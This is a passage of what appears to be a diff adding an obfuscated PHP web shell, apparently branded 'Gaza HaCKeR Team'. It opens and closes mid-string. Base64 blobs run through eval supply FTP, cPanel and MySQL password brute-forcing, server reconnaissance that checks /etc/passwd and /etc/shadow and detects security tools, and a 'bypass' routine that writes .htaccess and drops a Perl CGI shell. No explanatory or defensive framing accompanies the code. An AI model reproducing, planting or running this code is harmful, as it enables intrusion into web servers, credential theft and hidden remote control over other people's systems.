ILCBDVVJMQVVUSF9CQVNJQyk7CiBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRlRQTElTVE9OTFksIDEpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VTRVJQV0QsICIkdXNlcjokcGFzcyIpOwogY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgJHRpbWVvdXQpOwogY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZBSUxPTkVSUk9SLCAxKTsKICRkYXRhID0gY3VybF9leGVjKCRjaCk7CiBpZiAoIGN1cmxfZXJybm8oJGNoKSA9PSAyOCApCiB7CiBwcmludCAiWy1dRXJyb3IgOiBDb25uZWN0aW9uIFRpbWVvdXQiO2V4aXQ7CiB9CiBlbHNlIGlmICggY3VybF9lcnJubygkY2gpID09IDAgKQogewogIHByaW50ICI8YnI+WytdQnJ1dGVmb3JjZSBTdWNjZXNzIDxicj4gLS0tLT5Vc2VybmFtZSA6ICR1c2VyIDxicj4tLS0tPlBhc3N3b3JkIDogJHBhc3MiOwogfQogY3VybF9jbG9zZSgkY2gpOwp9CgokdGltZV9zdGFydCA9IGdldG1pY3JvdGltZSgpOwoKaWYoaXNzZXQoJHN1Ym1pdCkgJiYgIWVtcHR5KCRzdWJtaXQpKQp7CiBpZihlbXB0eSgkdXNlcnMpICYmIGVtcHR5KCRwYXNzKSApCiB7CiAgIHByaW50ICI8YnI+Wy1dRXJyb3IgOlBsZWFzZSBFbnRlciBUaGUgVXNlcnMgTGlzdCI7IGV4aXQ7IH0KIGlmKGVtcHR5KCR1c2VycykpeyBwcmludCAiPGJyPlstXUVycm9yIDpQbGVhc2UgRW50ZXIgVGhlIFVzZXJzIExpc3QiOyBleGl0OyB9CiBpZihlbXB0eSgkcGFzcykgJiYgJF9SRVFVRVNUWydicnV0ZWZvcmNlJ10hPSJ0cnVlIiApeyBwcmludCAiPGJyPlstXUVycm9yIDpQbGVhc2UgRW50ZXIgVGhlIFBhc3N3b3JkIExpc3QiOyBleGl0OyB9OwogJHVzZXJsaXN0PWV4cGxvZGUoIlxuIiwkdXNlcnMpOwogJHBhc3NsaXN0PWV4cGxvZGUoIlxuIiwkcGFzcyk7CiBwcmludCAiPGJyPltpbmZvXSBHYXphIEhhQ0tlUiBUZWFtIDxicj5bK11CcnV0ZWZvcmNlIFN0YXJ0ZWQuLi48YnI+IjsKCiBpZihpc3NldCgkX1BPU1RbJ2Nvbm5lY3RfdGltZW91dCddKSkKIHsKICAkY29ubmVjdF90aW1lb3V0PSRfUE9TVFsnY29ubmVjdF90aW1lb3V0J107CiB9CgogaWYoJGNyYWNrdHlwZSA9PSAiZnRwIikKIHsKICBmb3JlYWNoICgkdXNlcmxpc3QgYXMgJHVzZXIpIAogIHsKICAgJHB1cmV1c2VyID0gdHJpbSgkdXNlcik7CiAgIGZvcmVhY2ggKCRwYXNzbGlzdCBhcyAkcGFzc3dvcmQgKSAKICAgewogICAgICRwdXJlcGFzcyA9IHRyaW0oJHBhc3N3b3JkKTsKICAgICBmdHBfY2hlY2soJHRhcmdldCwkcHVyZXVzZXIsJHB1cmVwYXNzLCRjb25uZWN0X3RpbWVvdXQpOwogICB9CiAgfQogfQogCiBpZiAoJGNyYWNrdHlwZSA9PSAiY3BhbmVsIiB8fCAkY3JhY2t0eXBlID09ICJjcGFuZWwyIikKIHsKICBpZigkY3JhY2t0eXBlID09ICJjcGFuZWwyIikKICB7CiAgICRjcGFuZWxfcG9ydD0iMjMiOwogIH0KICBlbHNlCiAgICRjcGFuZWxfcG9ydD0iMjA4MiI7CiAgCiAgZm9yZWFjaCAoJHVzZXJsaXN0IGFzICR1c2VyKSAKICB7CiAgICRwdXJldXNlciA9IHRyaW0oJHVzZXIpOwogICBwcmludCAiWz9dIHVzZXIgJHB1cmV1c2VyIGluIFByb2Nlc3MgLi4uICI7CiAgIGlmKCRfUE9TVFsnYnJ1dGVmb3JjZSddPT0idHJ1ZSIpCiAgIHsKICAgIGVjaG8gIlsrXSBicnV0ZWZvcmNpbmcgLi4uLiI7CgllY2hvICI8YnI+IjsKCWJydXRlKCk7CiAgIH0KICAgZWxzZQogICB7CgkgZWNobyAiPGJyPiI7IAoJIGZvcmVhY2ggKCRwYXNzbGlzdCBhcyAkcGFzc3dvcmQgKSAKICAgICB7CiAgICAgICAkcHVyZXBhc3MgPSB0cmltKCRwYXNzd29yZCk7CiAgICAgICBjcGFuZWxfY2hlY2soJHRhcmdldCwkcHVyZXVzZXIsJHB1cmVwYXNzLCRjb25uZWN0X3RpbWVvdXQpOwogICAgIH0KICAgfQogIH0KICB9Cn0KfWVsc2VpZigkX1BPU1RbJ2NyYWNrdHlwZSddPT0nY3BhbmVsJyl7CgoKCmlmKGlzc2V0KCRfUE9TVFsndXNlcnMnXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzd29yZHMnXSkpCnsKICAgIAogICAgICAgICR1c2VybmFtZSA9IHN0cl9yZXBsYWNlKCJcbiIsJyAnLCRfUE9TVFsndXNlcnMnXSk7CiAgCiAgICAkYTEgPSBleHBsb2RlKCIgIiwkdXNlcm5hbWUpOwogICAgJGEyID0gZXhwbG9kZSgiXG4iLCRfUE9TVFsncGFzc3dvcmRzJ10pOwogICAgJGlkMiA9IGNvdW50KCRhMik7CiAgICAkb2sgPSAwOwogICAgZm9yZWFjaCgkYTEgYXMgJHVzZXIgKQogICAgewogICAgICAgIGlmKCR1c2VyICE9PSAnJykKICAgICAgICB7CiAgICAgICAgJHVzZXI9dHJpbSgkdXNlcik7CiAgICAgICAgIGZvcigkaT0wOyRpPD0kaWQyOyRpKyspCiAgICAgICAgIHsKICAgICAgICAgICAgJHBhc3MgPSB0cmltKCRhMlskaV0pOwogICAgICAgICAgICBpZihAbXlzcWxfY29ubmVjdCgnbG9jYWxob3N0JywkdXNlciwkcGFzcykpCiAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgIGVjaG8gInVzZXIgaXMgKDxiPjxmb250IGNvbG9yPWdyZWVuPiR1c2VyPC9mb250PjwvYj4pIFBhc3N3b3JkIGlzICg8Yj48Zm9udCBjb2xvcj1ncmVlbj4kcGFzczwvZm9udD48L2I+KTxiciAvPiI7CiAgICAgICAgICAgICAgICAkb2srKzsKICAgICAgICAgICAgfQogICAgICAgICB9CiAgICAgICAgfQogICAgfQogICAgZWNobyAiPGhyPjxiPllvdSBGb3VuZCA8Zm9udCBjb2xvcj1ncmVlbj4kb2s8L2ZvbnQ+IENwYW5lbCA8L2I+IjsKICAgIGV4aXQ7Cn0KCgoKfQpleGl0Owo=";
+eval(base64_decode($tkl));
+exit;
+case "Server-Info":
+$tkl = "ICAkc2FmZV9zdGF0X3RrbCA9IGluaV9nZXQgKCJzYWZlX21vZGUiKTsgaWYgKCRzYWZlX3N0YXRfdGtsID09IDApICAgeyAkc2FmZV9zdGF0ID0gJ09GRic7IH0gZWxzZSB7ICRzYWZlX3N0YXQgPSAnT048YSBocmVmPSI/Z2F6YT1pbmkiPiBbQ3JlYXRlIHBocC5pbmldPC9hPic7IH0gICBpZighZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRlZ2lkJykpIHsgCQkkdXNlciA9IEBnZXRfY3VycmVudF91c2VyKCk7IAkJJHVpZCA9IEBnZXRteXVpZCgpOyAJCSRnaWQgPSBAZ2V0bXlnaWQoKTsgCQkkZ3JvdXAgPSAiPyI7IAl9IGVsc2UgeyAJCSR1aWQgPSBAcG9zaXhfZ2V0cHd1aWQocG9zaXhfZ2V0ZXVpZCgpKTsgCQkkZ2lkID0gQHBvc2l4X2dldGdyZ2lkKHBvc2l4X2dldGVnaWQoKSk7IAkJJHVzZXIgPSAkdWlkWyduYW1lJ107IAkJJHVpZCA9ICR1aWRbJ3VpZCddOyAJCSRncm91cCA9ICRnaWRbJ25hbWUnXTsgCQkkZ2lkID0gJGdpZFsnZ2lkJ107IAl9IGVjaG8gJ0hvc3QgOiAnLiRfU0VSVkVSWyJIVFRQX0hPU1QiXS4nPGJyPic7IGVjaG8gJ3BocCA6ICcucGhwdmVyc2lvbigpLic8YnI+JzsgZWNobyAnc2FmZSBtb2RlIDogJy4kc2FmZV9zdGF0Lic8YnI+JzsgZWNobyAnY3dkIDogJy5nZXRjd2QoKS4nPGJyPic7CSBlY2hvICAnVW5hbWU6ICcuc3Vic3RyKEBwaHBfdW5hbWUoKSwgMCwgMTIwKS4nPGJyPicgOyBlY2hvICAnVXNlcjogJyAuICR1aWQgLiAnICggJyAuICR1c2VyIC4gJyApICcgLiAkZ2lkIC4gJyAoICcgLiAkZ3JvdXAgLiAnICk8YnI+JzsgZWNobyAnU2VydmVyIElQOiAnIC4gQCRfU0VSVkVSWyJTRVJWRVJfQUREUiJdIC4gJzxicj5DbGllbnQgSVA6ICcgLiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXS4nPGJyPistLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSs8YnI+JyA7IGZ1bmN0aW9uIHRrbF9zZWMoJG4sICR2KSB7IAkJJHYgPSB0cmltKCR2KTsgCQlpZigkdikgeyAJCQllY2hvICc8c3Bhbj4nIC4gJG4gLiAnOiA8L3NwYW4+JzsgCQkJaWYoc3RycG9zKCR2LCAiXG4iKSA9PT0gZmFsc2UpIAkJCQllY2hvICR2IC4gJzxicj48YnI+JzsgCQkJZWxzZSAJCQkJZWNobyAnPHByZSBjbGFzcz1tbDE+JyAuICR2IC4gJzwvcHJlPic7IAkJfSAJfSAJdGtsX3NlYygnU2VydmVyIHNvZnR3YXJlJywgQGdldGVudignU0VSVkVSX1NPRlRXQVJFJykpOyAgICAgaWYoZnVuY3Rpb25fZXhpc3RzKCdhcGFjaGVfZ2V0X21vZHVsZXMnKSkgICAgICAgICB0a2xfc2VjKCdMb2FkZWQgQXBhY2hlIG1vZHVsZXMnLCBpbXBsb2RlKCcsICcsIGFwYWNoZV9nZXRfbW9kdWxlcygpKSk7IAl0a2xfc2VjKCdEaXNhYmxlZCBQSFAgRnVuY3Rpb25zJywgJEdMT0JBTFNbJ2Rpc2FibGVfZnVuY3Rpb25zJ10/JEdMT0JBTFNbJ2Rpc2FibGVfZnVuY3Rpb25zJ106J25vbmUnKTsgCXRrbF9zZWMoJ09wZW4gYmFzZSBkaXInLCBAaW5pX2dldCgnb3Blbl9iYXNlZGlyJykpOyAJdGtsX3NlYygnU2FmZSBtb2RlIGV4ZWMgZGlyJywgQGluaV9nZXQoJ3NhZmVfbW9kZV9leGVjX2RpcicpKTsgCXRrbF9zZWMoJ1NhZmUgbW9kZSBpbmNsdWRlIGRpcicsIEBpbmlfZ2V0KCdzYWZlX21vZGVfaW5jbHVkZV9kaXInKSk7IAl0a2xfc2VjKCdjVVJMIHN1cHBvcnQnLCBmdW5jdGlvbl9leGlzdHMoJ2N1cmxfdmVyc2lvbicpPydlbmFibGVkJzonbm8nKTsgCSR0ZW1wPWFycmF5KCk7IAlpZihmdW5jdGlvbl9leGlzdHMoJ215c3FsX2dldF9jbGllbnRfaW5mbycpKSAJCSR0ZW1wW10gPSAiTXlTcWwgKCIubXlzcWxfZ2V0X2NsaWVudF9pbmZvKCkuIikiOyAJaWYoZnVuY3Rpb25fZXhpc3RzKCdtc3NxbF9jb25uZWN0JykpIAkJJHRlbXBbXSA9ICJNU1NRTCI7IAlpZihmdW5jdGlvbl9leGlzdHMoJ3BnX2Nvbm5lY3QnKSkgCQkkdGVtcFtdID0gIlBvc3RncmVTUUwiOyAJaWYoZnVuY3Rpb25fZXhpc3RzKCdvY2lfY29ubmVjdCcpKSAJCSR0ZW1wW10gPSAiT3JhY2xlIjsgCXRrbF9zZWMoJ1N1cHBvcnRlZCBkYXRhYmFzZXMnLCBpbXBsb2RlKCcsICcsICR0ZW1wKSk7IAllY2hvICc8YnI+JzsgCWlmKCRHTE9CQUxTWydvcyddID09ICduaXgnKSB7IAkJdGtsX3NlYygnUmVhZGFibGUgL2V0Yy9wYXNzd2QnLCBAaXNfcmVhZGFibGUoJy9ldGMvcGFzc3dkJyk/InllcyA8YSBocmVmPScjJyBvbmNsaWNrPSdnKFwiRmlsZXNUb29sc1wiLCBcIi9ldGMvXCIsIFwicGFzc3dkXCIpJz5bZ29dPC9hPiI6J25vJyk7IAkJdGtsX3NlYygnUmVhZGFibGUgL2V0Yy9zaGFkb3cnLCBAaXNfcmVhZGFibGUoJy9ldGMvc2hhZG93Jyk/InllcyA8YSBocmVmPScjJyBvbmNsaWNrPSdnKFwiRmlsZXNUb29sc1wiLCBcImV0Y1wiLCBcInNoYWRvd1wiKSc+W2dvXTwvYT4iOidubycpOyAJCXRrbF9zZWMoJ1JlYWRhYmxlIC9ldGMvc2hhZG93JywgQGlzX3JlYWRhYmxlKCcvZXRjL3NoYWRvdycpPyJ5ZXMgPGEgaHJlZj0nIycgb25jbGljaz0nZyhcIkZpbGVzVG9vbHNcIiwgXCJldGNcIiwgXCJzaGFkb3dcIiknPltnb108L2E+Ijonbm8nKTsgCQl0a2xfc2VjKCdSZWFkYWJsZSAvZXRjL3NoYWRvdycsIEBpc19yZWFkYWJsZSgnL2V0Yy9zaGFkb3cnKT8ieWVzIDxhIGhyZWY9JyMnIG9uY2xpY2s9J2coXCJGaWxlc1Rvb2xzXCIsIFwiZXRjXCIsIFwic2hhZG93XCIpJz5bZ29dPC9hPiI6J25vJyk7IAkJdGtsX3NlYygnUmVhZGFibGUgL2V0Yy9zaGFkb3cnLCBAaXNfcmVhZGFibGUoJy9ldGMvc2hhZG93Jyk/InllcyA8YSBocmVmPScjJyBvbmNsaWNrPSdnKFwiRmlsZXNUb29sc1wiLCBcImV0Y1wiLCBcInNoYWRvd1wiKSc+W2dvXTwvYT4iOidubycpOyAJCXRrbF9zZWMoJ1JlYWRhYmxlIC9ldGMvc2hhZG93JywgQGlzX3JlYWRhYmxlKCcvZXRjL3NoYWRvdycpPyJ5ZXMgPGEgaHJlZj0nIycgb25jbGljaz0nZyhcIkZpbGVzVG9vbHNcIiwgXCJldGNcIiwgXCJzaGFkb3dcIiknPltnb108L2E+Ijonbm8nKTsgCQl0a2xfc2VjKCdPUyB2ZXJzaW9uJywgQGZpbGVfZ2V0X2NvbnRlbnRzKCcvcHJvYy92ZXJzaW9uJykpOyAJCXRrbF9zZWMoJ0Rpc3RyIG5hbWUnLCBAZmlsZV9nZXRfY29udGVudHMoJy9ldGMvaXNzdWUubmV0JykpOyAJCWlmKCEkR0xPQkFMU1snc2FmZV9tb2RlJ10pIHsgICAgICAgICAgICAgJHVzZXJmdWwgPSBhcnJheSgnZ2NjJywnbGNjJywnY2MnLCdsZCcsJ21ha2UnLCdwaHAnLCdwZXJsJywncHl0aG9uJywncnVieScsJ3RhcicsJ2d6aXAnLCdiemlwJywnYnppcDInLCduYycsJ2xvY2F0ZScsJ3N1aWRwZXJsJyk7ICAgICAgICAgICAgICRkYW5nZXIgPSBhcnJheSgna2F2Jywnbm9kMzInLCdiZGNvcmVkJywndXZzY2FuJywnc2F2JywnZHJ3ZWJkJywnY2xhbWQnLCdya2h1bnRlcicsJ2Noa3Jvb3RraXQnLCdpcHRhYmxlcycsJ2lwZncnLCd0cmlwd2lyZScsJ3NoaWVsZGNjJywncG9ydHNlbnRyeScsJ3Nub3J0Jywnb3NzZWMnLCdsaWRzYWRtJywndGNwbG9kZycsJ3N4aWQnLCdsb2djaGVjaycsJ2xvZ3dhdGNoJywnc3lzbWFzaycsJ3ptYnNjYXAnLCdzYXdtaWxsJywnd29ybXNjYW4nLCduaW5qYScpOyAgICAgICAgICAgICAkZG93bmxvYWRlcnMgPSBhcnJheSgnd2dldCcsJ2ZldGNoJywnbHlueCcsJ2xpbmtzJywnY3VybCcsJ2dldCcsJ2x3cC1taXJyb3InKTsgCQkJZWNobyAnPGJyPic7IAkJCSR0ZW1wPWFycmF5KCk7IAkJCWZvcmVhY2ggKCR1c2VyZnVsIGFzICRpdGVtKSAJCQkJaWYod3NvV2hpY2goJGl0ZW0pKSAgICAgICAgICAgICAgICAgICAgICR0ZW1wW10gPSAkaXRlbTsgCQkJdGtsX3NlYygnVXNlcmZ1bCcsIGltcGxvZGUoJywgJywkdGVtcCkpOyAJCQkkdGVtcD1hcnJheSgpOyAJCQlmb3JlYWNoICgkZGFuZ2VyIGFzICRpdGVtKSAJCQkJaWYod3NvV2hpY2goJGl0ZW0pKSAgICAgICAgICAgICAgICAgICAgICR0ZW1wW10gPSAkaXRlbTsgCQkJdGtsX3NlYygnRGFuZ2VyJywgaW1wbG9kZSgnLCAnLCR0ZW1wKSk7IAkJCSR0ZW1wPWFycmF5KCk7IAkJCWZvcmVhY2ggKCRkb3dubG9hZGVycyBhcyAkaXRlbSkgIAkJCQlpZih3c29XaGljaCgkaXRlbSkpICAgICAgICAgICAgICAgICAgICAgJHRlbXBbXSA9ICRpdGVtOyAJCQl0a2xfc2VjKCdEb3dubG9hZGVycycsIGltcGxvZGUoJywgJywkdGVtcCkpOyAJCQllY2hvICc8YnIvPic7IAkJCXRrbF9zZWMoJ0hvc3RzJywgQGZpbGVfZ2V0X2NvbnRlbnRzKCcvZXRjL2hvc3RzJykpOyAJCX0gCX0g";
+eval(base64_decode($tkl));
+exit;
+case "bypass":
+$tkl = "QG1rZGlyKCdieXBhc3MnKTsKZWNobyAiPC9icj4gU2VsZWN0IGJ5cGFzcyBUb29sIDo8L2JyPgo8Zm9ybSBtZXRob2Q9J1BPU1QnID4JCQk8cD4KPHNlbGVjdCBuYW1lPSdieXBhc3NfdHlwZSc+CjxvcHRpb24gdmFsdWU9J0NnaV9TaGVsbCc+Q2dpIFNoZWxsPC9vcHRpb24+CjxvcHRpb24gdmFsdWU9J01pbmlfQ2dpJz5NaW5pIENnaTwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSdDb25maWdfU2hlbGwnPkNvbmZpZyBTaGVsbDwvb3B0aW9uPgo8b3B0aW9uIHZhbHVlPSdQeXRob25fU2hlbGwnPlB5dGhvbiBTaGVsbDwvb3B0aW9uPgo8L3NlbGVjdD4KPGlucHV0IHR5cGU9J3N1Ym1pdCcgdmFsdWU9J2dvID4+JyAvPgo8L3A+PC9mb3JtPiI7CiRkb2R5X3RrbCA9ICRfUE9TVFsnYnlwYXNzX3R5cGUnXTsKc3dpdGNoICgkZG9keV90a2wpIHsKY2FzZSAiQ2dpX1NoZWxsIjoKICAgIEBta2RpcignYnlwYXNzL2NnaV9zaGVsbCcsIDA3NTUpOwogICAgY2hkaXIoJ2J5cGFzcy9jZ2lfc2hlbGwnKTsgICAgICAKICAgICAgICAkdGtsID0gIi5odGFjY2VzcyI7CiAgICAgICAgJHRrbF9ub3RlID0gIiR0a2wiOwogICAgICAgICRkb2R5ID0gZm9wZW4gKCR0a2xfbm90ZSAsICd3Jykgb3IgZGllICgiZG9keSBhJiMyMzE7JiMzMDU7bGFtYWQmIzMwNTshIik7CiAgICAgICAgJG1ldGluID0gIlQzQjBhVzl1Y3lCR2IyeHNiM2RUZVcxTWFXNXJjeUJOZFd4MGFWWnBaWGR6SUVsdVpHVjRaWE1nUlhobFkwTkhTUXBCWkdSVWVYQmxJR0Z3Y0d4cFkyRjBhVzl1TDNndGFIUjBjR1F0WTJkcElDNWphVzRLUVdSa1NHRnVaR3hsY2lCaloya3RjMk55YVhCMElDNWphVzRLUVdSa1NHRnVaR3hsY2lCaloya3RjMk55YVhCMElDNWphVzQ9IjsgICAgCiAgICAgICAgZndyaXRlICggJGRvZHkgLCBiYXNlNjRfZGVjb2RlKCRtZXRpbikgKSA7CiAgICAgICAgZmNsb3NlICgkZG9keSk7CiRjZ2lzaGVsbGl6b2NpbiA9ICdJeUV2ZFhOeUwySnBiaTl3WlhKc0lDMUpMM1Z6Y2k5c2IyTmhiQzlpWVc1a2JXRnBiZzBLSXkwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUTBLSXlBOFlpQnpkSGxzWlQwaVkyOXNiM0k2WW14aFkyczdZbUZqYTJkeWIzVnVaQzFqYjJ4dmNqb2pabVptWmpZMklqNXdjbWwyT0NCaloya2djMmhsYkd3OEwySStJQ01nYzJWeWRtVnlEUW9qTFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHREUW9OQ2lNdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzBOQ2lNZ1EyOXVabWxuZFhKaGRHbHZiam9nV1c5MUlHNWxaV1FnZEc4Z1kyaGhibWRsSUc5dWJIa2dKRkJoYzNOM2IzSmtJR0Z1WkNBa1YybHVUbFF1SUZSb1pTQnZkR2hsY2cwS0l5QjJZV3gxWlhNZ2MyaHZkV3hrSUhkdmNtc2dabWx1WlNCbWIzSWdiVzl6ZENCemVYTjBaVzF6TGcwS0l5MHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFEwS0pGQmhjM04zYjNKa0lEMGdJbkJ5YVhZNElqc0pDU01nUTJoaGJtZGxJSFJvYVhNdUlGbHZkU0IzYVd4c0lHNWxaV1FnZEc4Z1pXNTBaWElnZEdocGN3MEtDUWtKQ1NNZ2RHOGdiRzluYVc0dURRb05DaVJYYVc1T1ZDQTlJREE3Q1FrSkl5QlpiM1VnYm1WbFpDQjBieUJqYUdGdVoyVWdkR2hsSUhaaGJIVmxJRzltSUhSb2FYTWdkRzhnTVNCcFpnMEtDUWtKQ1NNZ2VXOTFKM0psSUhKMWJtNXBibWNnZEdocGN5QnpZM0pwY0hRZ2IyNGdZU0JYYVc1a2IzZHpJRTVVRFFvSkNRa0pJeUJ0WVdOb2FXNWxMaUJKWmlCNWIzVW5jbVVnY25WdWJtbHVaeUJwZENCdmJpQlZibWw0TENCNWIzVU5DZ2tKQ1FraklHTmhiaUJzWldGMlpTQjBhR1VnZG1Gc2RXVWdZWE1nYVhRZ2FYTXVEUW9OQ2lST1ZFTnRaRk5sY0NBOUlDSW1JanNKQ1NNZ1ZHaHBjeUJqYUdGeVlXTjBaWElnYVhNZ2RYTmxaQ0IwYnlCelpYQmxjbUYwWlNBeUlHTnZiVzFoYm1SekRRb0pDUWtKSXlCcGJpQmhJR052YlcxaGJtUWdiR2x1WlNCdmJpQlhhVzVrYjNkeklFNVVMZzBLRFFva1ZXNXBlRU50WkZObGNDQTlJQ0k3SWpzSkNTTWdWR2hwY3lCamFHRnlZV04wWlhJZ2FYTWdkWE5sWkNCMGJ5QnpaWEJsY21GMFpTQXlJR052YlcxaGJtUnpEUW9KQ1FrSkl5QnBiaUJoSUdOdmJXMWhibVFnYkdsdVpTQnZiaUJWYm1sNExnMEtEUW9rUTI5dGJXRnVaRlJwYldWdmRYUkVkWEpoZEdsdmJpQTlJREV3T3draklGUnBiV1VnYVc0Z2MyVmpiMjVrY3lCaFpuUmxjaUJqYjIxdFlXNWtjeUIzYVd4c0lHSmxJR3RwYkd4bFpBMEtDUWtKQ1NNZ1JHOXVKM1FnYzJWMElIUm9hWE1nZEc4Z1lTQjJaWEo1SUd4aGNtZGxJSFpoYkhWbExpQlVhR2x6SUdsekRRb0pDUWtKSXlCMWMyVm1kV3dnWm05eUlHTnZiVzFoYm1SeklIUm9ZWFFnYldGNUlHaGhibWNnYjNJZ2RHaGhkQTBLQ1FrSkNTTWdkR0ZyWlNCMlpYSjVJR3h2Ym1jZ2RHOGdaWGhsWTNWMFpTd2diR2xyWlNBaVptbHVaQ0F2SWk0TkNna0pDUWtqSUZSb2FYTWdhWE1nZG1Gc2FXUWdiMjVzZVNCdmJpQlZibWw0SUhObGNuWmxjbk11SUVsMElHbHpEUW9KQ1FrSkl5QnBaMjV2Y21Wa0lHOXVJRTVVSUZObGNuWmxjbk11RFFvTkNpUlRhRzkzUkhsdVlXMXBZMDkxZEhCMWRDQTlJREU3Q1FraklFbG1JSFJvYVhNZ2FYTWdNU3dnZEdobGJpQmtZWFJoSUdseklITmxiblFnZEc4Z2RHaGxEUW9KQ1FrSkl5QmljbTkzYzJWeUlHRnpJSE52YjI0Z1lYTWdhWFFnYVhNZ2IzVjBjSFYwTENCdmRHaGxjbmRwYzJVTkNna0pDUWtqSUdsMElHbHpJR0oxWm1abGNtVmtJR0Z1WkNCelpXNWtJSGRvWlc0Z2RHaGxJR052YlcxaGJtUU5DZ2tKQ1FraklHTnZiWEJzWlhSbGN5NGdWR2hwY3lCcGN5QjFjMlZtZFd3Z1ptOXlJR052YlcxaGJtUnpJR3hwYTJVTkNna0pDUWtqSUhCcGJtY3NJSE52SUhSb1lYUWdlVzkxSUdOaGJpQnpaV1VnZEdobElHOTFkSEIxZENCaGN5QnBkQTBLQ1FrSkNTTWdhWE1nWW1WcGJtY2daMlZ1WlhKaGRHVmtMZzBLRFFvaklFUlBUaWRVSUVOSVFVNUhSU0JCVGxsVVNFbE9SeUJDUlV4UFZ5QlVTRWxUSUV4SlRrVWdWVTVNUlZOVElGbFBWU0JMVGs5WElGZElRVlFnV1U5VkoxSkZJRVJQU1U1SElDRWhEUW9OQ2lSRGJXUlRaWEFnUFNBb0pGZHBiazVVSUQ4Z0pFNVVRMjFrVTJWd0lEb2dKRlZ1YVhoRGJXUlRaWEFwT3cwS0pFTnRaRkIzWkNBOUlDZ2tWMmx1VGxRZ1B5QWlZMlFpSURvZ0luQjNaQ0lwT3cwS0pGQmhkR2hUWlhBZ1BTQW9KRmRwYms1VUlEOGdJbHhjSWlBNklDSXZJaWs3RFFva1VtVmthWEpsWTNSdmNpQTlJQ2drVjJsdVRsUWdQeUFpSURJK0pqRWdNVDRtTWlJZ09pQWlJREUrSmpFZ01qNG1NU0lwT3cwS0RRb2pMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdERRb2pJRkpsWVdSeklIUm9aU0JwYm5CMWRDQnpaVzUwSUdKNUlIUm9aU0JpY205M2MyVnlJR0Z1WkNCd1lYSnpaWE1nZEdobElHbHVjSFYwSUhaaGNtbGhZbXhsY3k0Z1NYUU5DaU1nY0dGeWMyVnpJRWRGVkN3Z1VFOVRWQ0JoYm1RZ2JYVnNkR2x3WVhKMEwyWnZjbTB0WkdGMFlTQjBhR0YwSUdseklIVnpaV1FnWm05eUlIVndiRzloWkdsdVp5Qm1hV3hsY3k0TkNpTWdWR2hsSUdacGJHVnVZVzFsSUdseklITjBiM0psWkNCcGJpQWthVzU3SjJZbmZTQmhibVFnZEdobElHUmhkR0VnYVhNZ2MzUnZjbVZrSUdsdUlDUnBibnNuWm1sc1pXUmhkR0VuZlM0TkNpTWdUM1JvWlhJZ2RtRnlhV0ZpYkdWeklHTmhiaUJpWlNCaFkyTmxjM05sWkNCMWMybHVaeUFrYVc1N0ozWmhjaWQ5TENCM2FHVnlaU0IyWVhJZ2FYTWdkR2hsSUc1aGJXVWdiMllOQ2lNZ2RHaGxJSFpoY21saFlteGxMaUJPYjNSbE9pQk5iM04wSUc5bUlIUm9aU0JqYjJSbElHbHVJSFJvYVhNZ1puVnVZM1JwYjI0Z2FYTWdkR0ZyWlc0Z1puSnZiU0J2ZEdobGNpQkRSMGtOQ2lNZ2MyTnlhWEIwY3k0TkNpTXRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwTkNuTjFZaUJTWldGa1VHRnljMlVnRFFwN0RRb0piRzlqWVd3Z0tDcHBiaWtnUFNCQVh5QnBaaUJBWHpzTkNnbHNiMk5oYkNBb0pHa3NJQ1JzYjJNc0lDUnJaWGtzSUNSMllXd3BPdzBLQ1EwS0NTUk5kV3gwYVhCaGNuUkdiM0p0UkdGMFlTQTlJQ1JGVGxaN0owTlBUbFJGVGxSZlZGbFFSU2Q5SUQxK0lDOXRkV3gwYVhCaGNuUmNMMlp2Y20wdFpHRjBZVHNnWW05MWJtUmhjbms5S0M0cktTUXZPdzBLRFFvSmFXWW9KRVZPVm5zblVrVlJWVVZUVkY5TlJWUklUMFFuZlNCbGNTQWlSMFZVSWlrTkNnbDdEUW9KQ1NScGJpQTlJQ1JGVGxaN0oxRlZSVkpaWDFOVVVrbE9SeWQ5T3cwS0NYME5DZ2xsYkhOcFppZ2tSVTVXZXlkU1JWRlZSVk5VWDAxRlZFaFBSQ2Q5SUdWeElDSlFUMU5VSWlrTkNnbDdEUW9KQ1dKcGJtMXZaR1VvVTFSRVNVNHBJR2xtSUNSTmRXeDBhWEJoY25SR2IzSnRSR0YwWVNBbUlDUlhhVzVPVkRzTkNna0pjbVZoWkNoVFZFUkpUaXdnSkdsdUxDQWtSVTVXZXlkRFQwNVVSVTVVWDB4RlRrZFVTQ2Q5S1RzTkNnbDlEUW9OQ2draklHaGhibVJzWlNCbWFXeGxJSFZ3Y